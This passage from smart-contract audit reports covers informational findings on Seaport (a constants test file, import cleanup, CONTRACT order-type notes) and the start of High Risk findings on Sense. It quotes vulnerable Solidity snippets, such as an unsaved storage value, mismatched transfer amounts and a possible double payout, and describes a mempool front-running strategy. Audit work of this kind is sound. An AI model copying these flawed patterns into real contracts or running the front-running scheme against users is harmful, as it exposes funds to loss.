constants, most being function selectors, that should be tested against. 
Recommendation: Consider adding the following foundry test file, ConstantsTest.t.sol, run with:

FOUNDRY_PROFILE=test forge test --match-contract ConstantsTest

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "forge-std/Test.sol";
import "../../contracts/lib/ConsiderationConstants.sol";
import "../../contracts/conduit/lib/ConduitConstants.sol";
import { ConduitInterface } from "../../contracts/interfaces/ConduitInterface.sol";
import { ContractOffererInterface } from "../../contracts/interfaces/ContractOffererInterface.sol";
import { EIP1271Interface } from "../../contracts/interfaces/EIP1271Interface.sol";
import { ZoneInterface } from "../../contracts/interfaces/ZoneInterface.sol";
import { FulfillmentApplicationErrors } from "../../contracts/interfaces/FulfillmentApplicationErrors.sol";
import { AmountDerivationErrors } from "../../contracts/interfaces/AmountDerivationErrors.sol";
import { CriteriaResolutionErrors } from "../../contracts/interfaces/CriteriaResolutionErrors.sol";
import { ZoneInteractionErrors } from "../../contracts/interfaces/ZoneInteractionErrors.sol";
import { SignatureVerificationErrors } from "../../contracts/interfaces/SignatureVerificationErrors.sol";
import { TokenTransferrerErrors } from "../../contracts/interfaces/TokenTransferrerErrors.sol";
import { ReentrancyErrors } from "../../contracts/interfaces/ReentrancyErrors.sol";
import { ConsiderationEventsAndErrors } from "../../contracts/interfaces/ConsiderationEventsAndErrors.sol";

contract ConstantsTest is Test {
    // ConsiderationConstants.sol

    // Function selectors

    /* function generateOrder(address fulfiller, SpentItem[] calldata minimumReceived,
       SpentItem[] calldata maximumSpent, bytes calldata context)
       - defined in ContractOffererInterface.sol */
    function test_generateOrder_selector() public {
        assertEq(generateOrder_selector, uint32(ContractOffererInterface.generateOrder.selector));
    }

    /* function ratifyOrder(SpentItem[] calldata offer, ReceivedItem[] calldata consideration,
       bytes calldata context, bytes32[] calldata orderHashes, uint256 contractNonce)
       - defined in ContractOffererInterface.sol */
    function test_ratifyOrder_selector() public {
        assertEq(ratifyOrder_selector, uint32(ContractOffererInterface.ratifyOrder.selector));
    }

    /* function validateOrder(ZoneParameters calldata zoneParameters)
       - defined in ZoneInterface.sol */
    function test_validateOrder_selector() public {
        assertEq(validateOrder_selector, uint32(ZoneInterface.validateOrder.selector));
    }

    /* function isValidSignature(bytes32 digest, bytes calldata signature)
       - defined in EIP1271Interface.sol */
    function test_isValidSignature_selector() public {
        assertEq(EIP1271_isValidSignature_selector, bytes32(EIP1271Interface.isValidSignature.selector));
    }

    // Error selectors

    /* error MissingFulfillmentComponentOnAggregation(uint8 side) - defined in FulfillmentApplicationErrors.sol */
    function test_MissingFulfillmentComponentOnAggregation_error_selector() public {
        assertEq(MissingFulfillmentComponentOnAggregation_error_selector, uint32(FulfillmentApplicationErrors.MissingFulfillmentComponentOnAggregation.selector));
    }

    /* error OfferAndConsiderationRequiredOnFulfillment() - defined in FulfillmentApplicationErrors.sol */
    function test_OfferAndConsiderationRequiredOnFulfillment_error_selector() public {
        assertEq(OfferAndConsiderationRequiredOnFulfillment_error_selector, uint32(FulfillmentApplicationErrors.OfferAndConsiderationRequiredOnFulfillment.selector));
    }

    /* error MismatchedFulfillmentOfferAndConsiderationComponents(uint256 fulfillmentIndex) - defined in FulfillmentApplicationErrors.sol */
    function test_MismatchedFulfillmentOfferAndConsiderationComponents_error_selector() public {
        assertEq(MismatchedFulfillmentOfferAndConsiderationComponents_error_selector, uint32(FulfillmentApplicationErrors.MismatchedFulfillmentOfferAndConsiderationComponents.selector));
    }

    /* error InvalidFulfillmentComponentData() - defined in FulfillmentApplicationErrors.sol */
    function test_InvalidFulfillmentComponentData_error_selector() public {
        assertEq(InvalidFulfillmentComponentData_error_selector, uint32(FulfillmentApplicationErrors.InvalidFulfillmentComponentData.selector));
    }

    /* error InexactFraction() - defined in AmountDerivationErrors.sol */
    function test_InexactFraction_error_selector() public {
        assertEq(InexactFraction_error_selector, uint32(AmountDerivationErrors.InexactFraction.selector));
    }

    /* error OrderCriteriaResolverOutOfRange(uint8 side) - defined in CriteriaResolutionErrors.sol */
    function test_OrderCriteriaResolverOutOfRange_error_selector() public {
        assertEq(OrderCriteriaResolverOutOfRange_error_selector, uint32(CriteriaResolutionErrors.OrderCriteriaResolverOutOfRange.selector));
    }

    /* error UnresolvedOfferCriteria(uint256 orderIndex, uint256 offerIndex) - defined in CriteriaResolutionErrors.sol */
    function test_UnresolvedOfferCriteria_error_selector() public {
        assertEq(UnresolvedOfferCriteria_error_selector, uint32(CriteriaResolutionErrors.UnresolvedOfferCriteria.selector));
    }

    /* error UnresolvedConsiderationCriteria(uint256 orderIndex, uint256 considerationIndex) - defined in CriteriaResolutionErrors.sol */
    function test_UnresolvedConsiderationCriteria_error_selector() public {
        assertEq(UnresolvedConsiderationCriteria_error_selector, uint32(CriteriaResolutionErrors.UnresolvedConsiderationCriteria.selector));
    }

    /* error OfferCriteriaResolverOutOfRange() - defined in CriteriaResolutionErrors.sol */
    function test_OfferCriteriaResolverOutOfRange_error_selector() public {
        assertEq(OfferCriteriaResolverOutOfRange_error_selector, uint32(CriteriaResolutionErrors.OfferCriteriaResolverOutOfRange.selector));
    }

    /* error ConsiderationCriteriaResolverOutOfRange() - defined in CriteriaResolutionErrors.sol */
    function test_ConsiderationCriteriaResolverOutOfRange_error_selector() public {
        assertEq(ConsiderationCriteriaResolverOutOfRange_error_selector, uint32(CriteriaResolutionErrors.ConsiderationCriteriaResolverOutOfRange.selector));
    }

    /* error CriteriaNotEnabledForItem() - defined in CriteriaResolutionErrors.sol */
    function test_CriteriaNotEnabledForItem_error_selector() public {
        assertEq(CriteriaNotEnabledForItem_error_selector, uint32(CriteriaResolutionErrors.CriteriaNotEnabledForItem.selector));
    }

    /* error InvalidProof() - defined in CriteriaResolutionErrors.sol */
    function test_InvalidProof_error_selector() public {
        assertEq(InvalidProof_error_selector, uint32(CriteriaResolutionErrors.InvalidProof.selector));
    }

    /* error InvalidRestrictedOrder(bytes32 orderHash) - defined in ZoneInteractionErrors.sol */
    function test_InvalidRestrictedOrder_error_selector() public {
        assertEq(InvalidRestrictedOrder_error_selector, uint32(ZoneInteractionErrors.InvalidRestrictedOrder.selector));
    }

    /* error InvalidContractOrder(bytes32 orderHash) - defined in ZoneInteractionErrors.sol */
    function test_InvalidContractOrder_error_selector() public {
        assertEq(InvalidContractOrder_error_selector, uint32(ZoneInteractionErrors.InvalidContractOrder.selector));
    }

    /* error BadSignatureV(uint8 v) - defined in SignatureVerificationErrors.sol */
    function test_BadSignatureV_error_selector() public {
        assertEq(BadSignatureV_error_selector, uint32(SignatureVerificationErrors.BadSignatureV.selector));
    }

    /* error InvalidSigner() - defined in SignatureVerificationErrors.sol */
    function test_InvalidSigner_error_selector() public {
        assertEq(InvalidSigner_error_selector, uint32(SignatureVerificationErrors.InvalidSigner.selector));
    }

    /* error InvalidSignature() - defined in SignatureVerificationErrors.sol */
    function test_InvalidSignature_error_selector() public {
        assertEq(InvalidSignature_error_selector, uint32(SignatureVerificationErrors.InvalidSignature.selector));
    }

    /* error BadContractSignature() - defined in SignatureVerificationErrors.sol */
    function test_BadContractSignature_error_selector() public {
        assertEq(BadContractSignature_error_selector, uint32(SignatureVerificationErrors.BadContractSignature.selector));
    }

    /* error InvalidERC721TransferAmount(uint256 amount) - defined in TokenTransferrerErrors.sol */
    function test_InvalidERC721TransferAmount_error_selector() public {
        assertEq(InvalidERC721TransferAmount_error_selector, uint32(TokenTransferrerErrors.InvalidERC721TransferAmount.selector));
    }

    /* error MissingItemAmount() - defined in TokenTransferrerErrors.sol */
    function test_MissingItemAmount_error_selector() public {
        assertEq(MissingItemAmount_error_selector, uint32(TokenTransferrerErrors.MissingItemAmount.selector));
    }

    /* error UnusedItemParameters() - defined in TokenTransferrerErrors.sol */
    function test_UnusedItemParameters_error_selector() public {
        assertEq(UnusedItemParameters_error_selector, uint32(TokenTransferrerErrors.UnusedItemParameters.selector));
    }

    /* error BadReturnValueFromERC20OnTransfer(address token, address from, address to, uint256 amount) - defined in TokenTransferrerErrors.sol */
    function test_BadReturnValueFromERC20OnTransfer_error_selector() public {
        assertEq(BadReturnValueFromERC20OnTransfer_error_selector, uint32(TokenTransferrerErrors.BadReturnValueFromERC20OnTransfer.selector));
    }

    /* error NoContract(address account) - defined in TokenTransferrerErrors.sol */
    function test_NoContract_error_selector() public {
        assertEq(NoContract_error_selector, uint32(TokenTransferrerErrors.NoContract.selector));
    }

    /* error Invalid1155BatchTransferEncoding() - defined in TokenTransferrerErrors.sol */
    function test_Invalid1155BatchTransferEncoding_error_selector() public {
        assertEq(Invalid1155BatchTransferEncoding_error_selector, uint32(TokenTransferrerErrors.Invalid1155BatchTransferEncoding.selector));
    }

    /* error NoReentrantCalls() - defined in ReentrancyErrors.sol */
    function test_NoReentrantCalls_error_selector() public {
        assertEq(NoReentrantCalls_error_selector, uint32(ReentrancyErrors.NoReentrantCalls.selector));
    }

    /* error OrderAlreadyFilled(bytes32 orderHash) - defined in ConsiderationEventsAndErrors.sol */
    function test_OrderAlreadyFilled_error_selector() public {
        assertEq(OrderAlreadyFilled_error_selector, uint32(ConsiderationEventsAndErrors.OrderAlreadyFilled.selector));
    }

    /* error InvalidTime(uint256 startTime, uint256 endTime) - defined in ConsiderationEventsAndErrors.sol */
    function test_InvalidTime_error_selector() public {
        assertEq(InvalidTime_error_selector, uint32(ConsiderationEventsAndErrors.InvalidTime.selector));
    }

    /* error InvalidConduit(bytes32 conduitKey, address conduit) - defined in ConsiderationEventsAndErrors.sol */
    function test_InvalidConduit_error_selector() public {
        assertEq(InvalidConduit_error_selector, uint32(ConsiderationEventsAndErrors.InvalidConduit.selector));
    }

    /* error MissingOriginalConsiderationItems() - defined in ConsiderationEventsAndErrors.sol */
    function test_MissingOriginalConsiderationItems_error_selector() public {
        assertEq(MissingOriginalConsiderationItems_error_selector, uint32(ConsiderationEventsAndErrors.MissingOriginalConsiderationItems.selector));
    }

    /* error InvalidCallToConduit(address conduit) - defined in ConsiderationEventsAndErrors.sol */
    function test_InvalidCallToConduit_error_selector() public {
        assertEq(InvalidCallToConduit_error_selector, uint32(ConsiderationEventsAndErrors.InvalidCallToConduit.selector));
    }

    /* error ConsiderationNotMet(uint256 orderIndex, uint256 considerationIndex, uint256 shortfallAmount) - defined in ConsiderationEventsAndErrors.sol */
    function test_ConsiderationNotMet_error_selector() public {
        assertEq(ConsiderationNotMet_error_selector, uint32(ConsiderationEventsAndErrors.ConsiderationNotMet.selector));
    }

    /* error InsufficientEtherSupplied() - defined in ConsiderationEventsAndErrors.sol */
    function test_InsufficientEtherSupplied_error_selector() public {
        assertEq(InsufficientEtherSupplied_error_selector, uint32(ConsiderationEventsAndErrors.InsufficientEtherSupplied.selector));
    }

    /* error EtherTransferGenericFailure(address account, uint256 amount) - defined in ConsiderationEventsAndErrors.sol */
    function test_EtherTransferGenericFailure_error_selector() public {
        assertEq(EtherTransferGenericFailure_error_selector, uint32(ConsiderationEventsAndErrors.EtherTransferGenericFailure.selector));
    }

    /* error PartialFillsNotEnabledForOrder() - defined in ConsiderationEventsAndErrors.sol */
    function test_PartialFillsNotEnabledForOrder_error_selector() public {
        assertEq(PartialFillsNotEnabledForOrder_error_selector, uint32(ConsiderationEventsAndErrors.PartialFillsNotEnabledForOrder.selector));
    }

    /* error OrderIsCancelled(bytes32 orderHash) - defined in ConsiderationEventsAndErrors.sol */
    function test_OrderIsCancelled_error_selector() public {
        assertEq(OrderIsCancelled_error_selector, uint32(ConsiderationEventsAndErrors.OrderIsCancelled.selector));
    }

    /* error OrderPartiallyFilled(bytes32 orderHash) - defined in ConsiderationEventsAndErrors.sol */
    function test_OrderPartiallyFilled_error_selector() public {
        assertEq(OrderPartiallyFilled_error_selector, uint32(ConsiderationEventsAndErrors.OrderPartiallyFilled.selector));
    }

    /* error InvalidCanceller() - defined in ConsiderationEventsAndErrors.sol */
    function test_InvalidCanceller_error_selector() public {
        assertEq(InvalidCanceller_error_selector, uint32(ConsiderationEventsAndErrors.InvalidCanceller.selector));
    }

    /* error BadFraction() - defined in ConsiderationEventsAndErrors.sol */
    function test_BadFraction_error_selector() public {
        assertEq(BadFraction_error_selector, uint32(ConsiderationEventsAndErrors.BadFraction.selector));
    }

    /* error InvalidMsgValue(uint256 value) - defined in ConsiderationEventsAndErrors.sol */
    function test_InvalidMsgValue_error_selector() public {
        assertEq(InvalidMsgValue_error_selector, uint32(ConsiderationEventsAndErrors.InvalidMsgValue.selector));
    }

    /* error InvalidBasicOrderParameterEncoding() - defined in ConsiderationEventsAndErrors.sol */
    function test_InvalidBasicOrderParameterEncoding_error_selector() public {
        assertEq(InvalidBasicOrderParameterEncoding_error_selector, uint32(ConsiderationEventsAndErrors.InvalidBasicOrderParameterEncoding.selector));
    }

    /* error NoSpecifiedOrdersAvailable() - defined in ConsiderationEventsAndErrors.sol */
    function test_NoSpecifiedOrdersAvailable_error_selector() public {
        assertEq(NoSpecifiedOrdersAvailable_error_selector, uint32(ConsiderationEventsAndErrors.NoSpecifiedOrdersAvailable.selector));
    }

    /* error InvalidNativeOfferItem() - defined in ConsiderationEventsAndErrors.sol */
    function test_InvalidNativeOfferItem_error_selector() public {
        assertEq(InvalidNativeOfferItem_error_selector, uint32(ConsiderationEventsAndErrors.InvalidNativeOfferItem.selector));
    }

    /* error ConsiderationLengthExceedsTotalOriginal() - defined in ConsiderationEventsAndErrors.sol */
    function test_ConsiderationLengthExceedsTotalOriginal_error_selector() public {
        assertEq(ConsiderationLengthExceedsTotalOriginal_error_selector, uint32(ConsiderationEventsAndErrors.ConsiderationLengthExceedsTotalOriginal.selector));
    }

    /* error Panic(uint256 code) - built-in Solidity error */
    function test_Panic_error_selector() public {
        assertEq(Panic_error_selector, uint32(bytes4(keccak256("Panic(uint256)"))));
    }

    // uint256 constant MaxUint8 = 0xff;
    function testMaxUint8() public {
        assertEq(MaxUint8, type(uint8).max);
    }

    // uint256 constant MaxUint120 = 0xffffffffffffffffffffffffffffff;
    function testMaxUint120() public {
        assertEq(MaxUint120, type(uint120).max);
    }

    // ConduitConstants.sol

    // Error signature

    /* error ChannelClosed(address channel) - defined in ConduitInterface.sol */
    function test_ChannelClosed_error_signature() public {
        assertEq(bytes32(ChannelClosed_error_signature), bytes32(ConduitInterface.ChannelClosed.selector));
    }
}

Seaport: Fixed in PR 885.
Spearbit: Verified.

+5.4.45 Unused / Redundant imports in ZoneInteraction.sol
Severity: Informational
Context: ZoneInteraction.sol
Description: There are multiple unused / redundant imports.
Recommendation: Remove the following imports:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import { ZoneInterface } from "../interfaces/ZoneInterface.sol";
-import {
-    ContractOffererInterface
-} from "../interfaces/ContractOffererInterface.sol";
-import { ItemType, OrderType } from "./ConsiderationEnums.sol";
+import { OrderType } from "./ConsiderationEnums.sol";
import {
-    AdvancedOrder,
-    OrderParameters,
-    BasicOrderParameters,
-    AdditionalRecipient,
     ZoneParameters,
-    OfferItem,
-    ConsiderationItem,
-    SpentItem,
-    ReceivedItem
} from "./ConsiderationStructs.sol";
import { ZoneInteractionErrors } from "../interfaces/ZoneInteractionErrors.sol";
import { LowLevelHelpers } from "./LowLevelHelpers.sol";
-import "./ConsiderationConstants.sol";
-import "./ConsiderationErrors.sol";
-import "./PointerLibraries.sol";
import "./ConsiderationEncoder.sol";

Seaport: Fixed in PR 833.
Spearbit: Verified.

+5.4.46 Orders of CONTRACT order type do not enforce a usage of a specific conduit
Severity: Informational
Context:
• ConsiderationStructs.sol#L149
• ContractOffererInterface.sol#L7-L12
• ContractOffererInterface.sol#L16-L22
• ZoneInteraction.sol#L119-L124
• ConsiderationEncoder.sol#L128
• ConsiderationEncoder.sol#L65
• OrderValidator.sol#L369-L372
Description: Neither of the endpoints (generateOrder and ratifyOrder) for an order of CONTRACT order type enforces the usage of a specific conduit. A contract offerer can enforce the usage of a specific conduit, or just Seaport, by setting allowances or approvals for specific tokens. If a caller calls into different Seaport endpoints and does not provide the correct conduit key, the order would revert. Currently, the ContractOffererInterface interface does not have a specific endpoint to discover which conduits the contract offerer would prefer users to use; getMetadata() could return metadata that encodes the conduit key. For (advanced) orders that are not of CONTRACT order type, the offerer signs the order and the conduit key is included in the signed hash. Thus, the conduit is enforced whenever that order gets included in a collection by an actor calling Seaport.
Recommendation: The above points would need to be documented/commented for the users, and perhaps an endpoint for discovering conduit keys could be added to ContractOffererInterface.
Seaport: Fixed in PR 887.
Spearbit: Verified.
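Purely as an illustration of that recommendation, such a discovery endpoint could look like the sketch below. getPreferredConduitKey and ConduitPreferringOfferer are hypothetical names and are not part of Seaport's actual ContractOffererInterface:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Hypothetical extension of a contract offerer: callers could query the
// preferred conduit key off-chain before building their fulfillment.
interface ConduitPreferringOfferer {
    // Returns the conduit key the offerer has set token approvals for
    // (bytes32(0) could signal "approve Seaport directly").
    function getPreferredConduitKey() external view returns (bytes32 conduitKey);
}

contract ExampleOfferer is ConduitPreferringOfferer {
    bytes32 internal immutable preferredConduitKey;

    constructor(bytes32 conduitKey) {
        preferredConduitKey = conduitKey;
    }

    function getPreferredConduitKey() external view override returns (bytes32) {
        return preferredConduitKey;
    }
}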
+5.4.47 Calls to Seaport that would fulfill or match a collection of advanced orders can be front-run to claim any unused offer items
Severity: Informational
Context:
• Consideration.sol#L222
• Consideration.sol#L320
• Consideration.sol#L382
• Consideration.sol#L435
Description: Calls to Seaport that would fulfill or match a collection of advanced orders can be front-run to claim any unused offer items. These endpoints include:
• fulfillAvailableOrders
• fulfillAvailableAdvancedOrders
• matchOrders
• matchAdvancedOrders
Anyone can monitor the mempool to find calls to the above endpoints and calculate whether there are any unused offer item amounts. If there are, the actor can create orders with no offer items, but with consideration items mirroring the unused offer items, and populate the fulfillment aggregation data to match the unused offer items with the new mirrored consideration items. Under certain conditions, such a call by the actor would be successful. For example, if orders of CONTRACT order type are involved, the contract offerer might reject this actor (the rejection might also come from the zones used when validating the order). But in general, this strategy can be implemented by anyone.
Recommendation: The above scenario should be documented and perhaps monitored.
Seaport: Fixed in PR 886.
Spearbit: Verified.

+5.4.48 Advanced orders of CONTRACT order type can generate orders with more offer items, and the extra offer items might not end up being used
Severity: Informational
Context:
• OrderValidator.sol#L410-L413
Description: When Seaport gets a collection of advanced orders to fulfill or match, if one of the orders has a CONTRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide extra offer items for this order. These extra offer items might not have been known beforehand by the caller, and if the caller does not incorporate the indexes of the extra items in the fulfillment aggregation data, the extra items will not be aggregated into any executions.
Recommendation: The extra offer items provided by a contract offerer might not end up being used when fulfilling or matching a collection of advanced orders. The caller would need knowledge of these extra items beforehand to incorporate them. If the contract offerer implements previewOrder so that it returns the same data as generateOrder when given the same input data, then the caller can predict the fulfillment aggregation data. This scenario should be documented regardless.
Seaport: Acknowledged.
Spearbit: Acknowledged.

+5.4.49 Typo for the index check comment in _aggregateValidFulfillmentConsiderationItems
Severity: Informational
Context:
• FulfillmentApplier.sol#L566
Description: There is a typo in _aggregateValidFulfillmentConsiderationItems:

// Retrieve item index using an offset of the fulfillment pointer.
let itemIndex := mload(
    add(mload(fulfillmentHeadPtr), Fulfillment_itemIndex_offset)
)

// Ensure that the order index is not out of range. <---------- the line with the typo
if iszero(lt(itemIndex, mload(considerationArrPtr))) {
    throwInvalidFulfillmentComponentData()
}

The itemIndex above refers to the index in the consideration array, not the order.
Recommendation:

- // Ensure that the order index is not out of range.
+ // Ensure that the consideration item index is not out of range.

Seaport: Fixed in PR 819.
Spearbit: Verified.
+5.4.50 Document the unused parameters for orders of CONTRACT order type
Severity: Informational
Context:
• ConsiderationDecoder.sol#L569-L574
• OrderFulfiller.sol#L381
Description: If an advanced order advancedOrder is of CONTRACT order type, certain parameters are not used in the code base, specifically:
• numerator: only used for skipping certain operations (see "AdvancedOrder.numerator and AdvancedOrder.denominator are unchecked for orders of CONTRACT order type")
• denominator: --
• signature: --
• parameters.zone: only used when emitting the OrderFulfilled event.
• parameters.offer.endAmount: endAmount and startAmount for offer items will be set to the amount sent back by generateOrder for the corresponding item.
• parameters.consideration.endAmount: endAmount and startAmount for consideration items will be set to the amount sent back by generateOrder for the corresponding item.
• parameters.consideration.recipient: the offerer contract returns new recipients when generateOrder gets called.
• parameters.zoneHash: --
• parameters.salt: --
• parameters.totalOriginalConsiderationItems: --
Recommendation: Document the decision for not including these parameters.
Seaport: Acknowledged.
Spearbit: Acknowledged.

+5.4.51 The check against totalOriginalConsiderationItems is skipped for orders of CONTRACT order type
Severity: Informational
Context: Assertions.sol#L54-L57
Description: The following inequality, which compares AdvancedOrder.parameters.totalOriginalConsiderationItems with AdvancedOrder.parameters.consideration.length, is skipped for orders of CONTRACT order type:

// Ensure supplied consideration array length is not less than the original.
if (suppliedConsiderationItemTotal < originalConsiderationItemTotal) {
    _revertMissingOriginalConsiderationItems();
}

Recommendation: Leave a comment/document that the above inequality is skipped for CONTRACT order types.
Seaport: Fixed in commit af89836.
Spearbit: Verified.

+5.4.52 getOrderStatus returns the default values for an orderHash that is derived for orders of CONTRACT order type
Severity: Informational
Context:
• Consideration.sol#L548
Description: Since _orderStatus[orderHash] does not get set for orders of CONTRACT order type, getOrderStatus would always return (false, false, 0, 0) for those hashes (unless there is a hash collision with other types of orders).
Recommendation: This scenario can be documented in the NatSpec comments for getOrderStatus, or make sure to update _orderStatus[orderHash] for orders of CONTRACT order type.
Seaport: Fixed in PR 835.
Spearbit: Verified.

+5.4.53 validate skips CONTRACT order types but cancel does not
Severity: Informational
Context:
• Consideration.sol#L488
• Consideration.sol#L466
• OrderValidator.sol#L592-L595
Description: When validating orders, validate skips any order of CONTRACT order type, but cancel does not skip these order types. When fulfilling or matching orders of CONTRACT order type, _orderStatus does not get checked or populated, yet in cancel the isValidated and isCancelled fields get set. This is basically a no-op for these order types.
Recommendation: To be consistent with the validation endpoint, cancel can also skip updating _orderStatus for orders of CONTRACT order type. The skipping check might add some gas overhead when the order is not of this type, but when it is, it will save some gas.
Seaport: Fixed in PR 853.
Spearbit: Verified.
+5.4.54 The literal 0x1c used as the starting offset of a custom error in a revert statement can be replaced by the named constant Error_selector_offset
Severity: Informational
Context:
• AmountDeriver.sol#L128
• Assertions.sol#L99
• Executor.sol#L255
• FulfillmentApplier.sol#L233
• FulfillmentApplier.sol#L243
• FulfillmentApplier.sol#L486
• FulfillmentApplier.sol#L522
• FulfillmentApplier.sol#L532
• FulfillmentApplier.sol#L761
• OrderValidator.sol#L270
• SignatureVerification.sol#L219
• SignatureVerification.sol#L228
• SignatureVerification.sol#L256
• SignatureVerification.sol#L263
• SignatureVerification.sol#L291
• TokenTransferrer.sol#L221
• TokenTransferrer.sol#L263
• TokenTransferrer.sol#L353
• TokenTransferrer.sol#L392
• TokenTransferrer.sol#L495
• TokenTransferrer.sol#L571
• ConsiderationConstants.sol#L410
Description: In the context above, 0x1c is used to signal the start of a custom error block saved in memory:

revert(0x1c, _LENGTH_)

For the above literal, we also have a named constant defined in ConsiderationConstants.sol#L410:

uint256 constant Error_selector_offset = 0x1c;

The named constant Error_selector_offset has been used in most places where a custom error is reverted in an assembly block.
Recommendation: The literal 0x1c used as the starting offset of a custom error revert can be replaced by the named constant Error_selector_offset:

import { Error_selector_offset } from "./ConsiderationConstants.sol";
...
revert(Error_selector_offset, _LENGTH_)

Seaport: Fixed in PR 813.
Spearbit: Verified.

diff --git a/findings_newupdate/spearbit/Sense-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Sense-Spearbit-Security-Review.txt
new file mode 100644
index 0000000..696ceef
--- /dev/null
+++ b/findings_newupdate/spearbit/Sense-Spearbit-Security-Review.txt
@@ -0,0 +1,72 @@
+3.1.1 The Variable maxscale Is Not Saved
Severity: High Risk
Context: Divider.sol#L334-382
Situation: In the function _collect() of Divider.sol, the value maxscale is updated in a temporary variable. However, this temporary variable is not written back to its origin, so the value of maxscale is not kept over time.

function _collect(...) internal returns (uint256 collected) {
    ...
    Series memory _series = series[adapter][maturity];
    ...
    // If this is larger than the largest scale we've seen for this Series, use it
    if (cscale > _series.maxscale) { // _series is a local variable
        _series.maxscale = cscale;
        lscales[adapter][maturity][usr] = cscale;
    // If not, use the previously noted max scale value
    } else {
        lscales[adapter][maturity][usr] = _series.maxscale;
    }
} // _series is not saved to series[adapter][maturity]

Recommendation: Do one of the following:
• Replace memory with storage. This way any access to _series translates to sload/sstore.

Series storage _series = series[adapter][maturity];

• At the end of function _collect(), add the following to "save" the value of _series.maxscale. This assumes maxscale is the only part that has to be saved.

series[adapter][maturity].maxscale = _series.maxscale;

Sense: Addressed in #163.
Spearbit: Acknowledged.

+3.1.2 Reserves Not Always Updated In onJoinPool()
Severity: High Risk
Context: Space.sol#L148-223
Recommendation: In the if part, add something like the following before the call to _cacheReserves():

reserves[_targeti] += reqAmountsIn[_targeti];

Sense: Addressed in #1.
Spearbit: Acknowledged.
+3.1.3 Wrong Amount in sponsorSeries
Severity: High Risk
Context: Periphery.sol#L66-76
Situation: In function sponsorSeries(), a different amount is used with safeTransferFrom() than with safeApprove() when the number of decimals of the stake token != 18. Normally, safeTransferFrom() and safeApprove() should use the same amount.

function sponsorSeries(address adapter, uint48 maturity) external returns (address zero, address claim) {
    ...
    // Transfer stakeSize from sponsor into this contract
    uint256 stakeDecimals = ERC20(stake).decimals();
    ERC20(stake).safeTransferFrom(msg.sender, address(this), _convertToBase(stakeSize, stakeDecimals)); // amount 1
    // Approve divider to withdraw stake assets
    ERC20(stake).safeApprove(address(divider), stakeSize); // amount 2
}

Recommendation: Spearbit recommends double checking which of these two amounts is the right one and updating the code. We also recommend considering adding unit tests with stake tokens that have less than 18 decimals.
Sense: Fixed here. We've gotten rid of _convertToBase so the amount should just be stakeSize.
Spearbit: Acknowledged.

+3.1.4 Return value missing in wrapUnderlying() WstETHAdapter
Severity: High Risk
Context:
1. WstETHAdapter.sol#L136-142
2. CAdapter.sol#L130-154
3. Periphery.sol#L253-272
Situation: The function wrapUnderlying() of WstETHAdapter does not return any value, which means it returns 0. On the contrary, the function wrapUnderlying() of CAdapter returns the amount of tokens sent: tBal. The contract Periphery, which calls wrapUnderlying(), expects a return value and bases its following actions on this return value.

contract WstETHAdapter is BaseAdapter {
    ...
    function wrapUnderlying(uint256 amount) external override returns (uint256) {
        ...
        ERC20(WSTETH).safeTransfer(msg.sender, wstETH); // transfer wstETH to msg.sender
        // no return value
    }
}

contract CAdapter is CropAdapter {
    ...
    function wrapUnderlying(uint256 uBal) external override returns (uint256) {
        ...
        ERC20(target).safeTransfer(msg.sender, tBal);
        return tBal;
    }
}

contract Periphery is Trust {
    ...
    function addLiquidityFromUnderlying(...) ... {
        ...
        uint256 tBal = Adapter(adapter).wrapUnderlying(uBal);
        return _addLiquidity(adapter, maturity, tBal, mode); // tBal being used here
    }
}

Recommendation: In the function wrapUnderlying() of WstETHAdapter, at the end, add the following:

return wstETH;

Add unit tests for WstETHAdapter to detect these types of errors.
Sense: Fixed here.
Spearbit: It was not fixed in the above commit. There is still a stack variable declared that will shadow the return variable. It seems it was fixed in a different commit here, but still no test coverage was added for this issue on the dev branch.
Spearbit: Acknowledged.
+3.1.5 Send Reward And Stake Once
Severity: High Risk
Context: Divider.sol#L157-180, Divider.sol#L511-547
Situation: A reward and stake can be sent from settleSeries() or backfillScale(). However, this should only be done once. Luckily settleSeries() can't be run twice, as this is prevented by _canBeSettled(). However, backfillScale() might be called multiple times. This could result in the function trying to send the reward and the stake multiple times.

function settleSeries(address adapter, uint48 maturity) external nonReentrant whenNotPaused {
    ...
    // prevents calling this function twice
    require(_canBeSettled(adapter, maturity), Errors.OutOfWindowBoundaries);
    ...
    ERC20(target).safeTransferFrom(adapter, msg.sender, series[adapter][maturity].reward);
    ERC20(stake).safeTransferFrom(adapter, msg.sender, stakeSize);
    ...
}

function backfillScale(...) external requiresTrust {
    ...
    uint256 reward = series[adapter][maturity].reward;
    ERC20(target).safeTransferFrom(adapter, cup, reward);
    ERC20(stake).safeTransferFrom(adapter, stakeDst, stakeSize);
    ...
}

Recommendation: After sending the reward and the stake, set a flag to prevent sending them a second time.
Sense: Addressed in #155.
Spearbit: The reward is set to 0 now, so it won't be transferred twice. There may still, however, be a risk with stakeSize.
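As an illustration of the recommended flag, the sketch below guards the payout with a per-series latch that is set before the external calls. The names (rewardsPaid, _payOutOnce) are hypothetical; this is not the fix Sense shipped in #155:

pragma solidity ^0.8.0;

interface IERC20Like {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

// Minimal sketch: a once-only guard around the reward/stake payout.
contract BackfillGuardSketch {
    mapping(address => mapping(uint48 => bool)) public rewardsPaid;

    function _payOutOnce(
        IERC20Like target,
        IERC20Like stake,
        address adapter,
        uint48 maturity,
        address rewardDst,
        address stakeDst,
        uint256 reward,
        uint256 stakeSize
    ) internal {
        require(!rewardsPaid[adapter][maturity], "already paid");
        // Set the flag before the external calls (checks-effects-interactions),
        // so a repeated or reentrant call cannot pass the check again.
        rewardsPaid[adapter][maturity] = true;
        target.transferFrom(adapter, rewardDst, reward);
        stake.transferFrom(adapter, stakeDst, stakeSize);
    }
}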
+3.1.6 Untrusted ERC-20 decimals() Return Values Could Be Mutated, Uncached Access Shouldn't Be Considered Reliable
Severity: High Risk
Context:
• Space.sol#L133, GClaimManager.sol#L59, CAdapter.sol#L96,
• CAdapter.sol#L109, CAdapter.sol#L113-115, Divider.sol#L426-427,
• Periphery.sol#L70-71, Periphery.sol#L546-548, Divider.sol#L676.
